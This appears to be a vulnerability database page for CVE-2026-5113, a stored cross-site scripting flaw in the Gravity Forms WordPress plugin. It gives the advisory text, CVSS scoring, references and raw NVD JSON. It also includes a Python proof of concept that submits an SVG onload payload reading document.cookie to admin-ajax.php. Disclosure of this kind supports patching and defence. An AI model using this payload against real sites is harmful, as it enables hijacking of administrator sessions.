CVE-2026-5113

Description

The Gravity Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Consent field hidden inputs in versions up to and including 2.10.0. This is due to a flawed state validation mechanism that fails open when input is sanitized by wp_kses(), combined with insufficient output escaping. The state validation logic creates two hashes (raw input and wp_kses-sanitized input) and only fails validation if BOTH hashes don't match the original state. When an attacker injects XSS payloads using tags stripped by wp_kses() (like <svg>), the sanitized hash matches while the malicious raw value is preserved and saved to the database. When administrators view the Entries List page, the stored malicious consent label is retrieved and output without escaping, causing the XSS payload to execute. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in entries that will execute whenever an authenticated administrator accesses the entries list page.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Gravity Forms <= 2.10.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit(target_url, form_id):
    """
    PoC for CVE-2026-5113
    Exploits Stored XSS in Gravity Forms via Consent field.
    """
    # Target endpoint usually handles AJAX submissions or standard form posts
    submit_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Payload using <svg> which gets stripped by wp_kses but raw value is saved
    # due to the flawed hash validation logic.
    xss_payload = '<svg/onload=alert(document.cookie)>'
    
    data = {
        "action": "gform_submit",
        "form_id": form_id,
        # Assuming input_1 is the vulnerable consent field ID
        "input_1": xss_payload, 
        "is_submit_1": "1"
    }
    
    try:
        response = requests.post(submit_url, data=data)
        if response.status_code == 200:
            print(f"[+] Payload sent to {target_url}")
            print("[*] Check the Entries List page as an admin to trigger XSS.")
        else:
            print(f"[-] Failed to send payload. Status code: {response.status_code}")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    # Replace with actual target details
    exploit("http://localhost/wordpress", "1")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5113
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5113
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5113/
[4] VulDB https://vuldb.com/cve/CVE-2026-5113
[5] https://docs.gravityforms.com/gravityforms-change-log/
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/5890c0f1-f549-4076-9d57-74f5eaffdcb3?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5113", "sourceIdentifier": "[email protected]", "published": "2026-05-02T06:16:04.020", "lastModified": "2026-05-05T19:16:18.390", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Gravity Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Consent field hidden inputs in versions up to and including 2.10.0. This is due to a flawed state validation mechanism that fails open when input is sanitized by wp_kses(), combined with insufficient output escaping. The state validation logic creates two hashes (raw input and wp_kses-sanitized input) and only fails validation if BOTH hashes don't match the original state. When an attacker injects XSS payloads using tags stripped by wp_kses() (like <svg>), the sanitized hash matches while the malicious raw value is preserved and saved to the database. When administrators view the Entries List page, the stored malicious consent label is retrieved and output without escaping, causing the XSS payload to execute. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in entries that will execute whenever an authenticated administrator accesses the entries list page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://docs.gravityforms.com/gravityforms-change-log/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5890c0f1-f549-4076-9d57-74f5eaffdcb3?source=cve", "source": "[email protected]"}]}}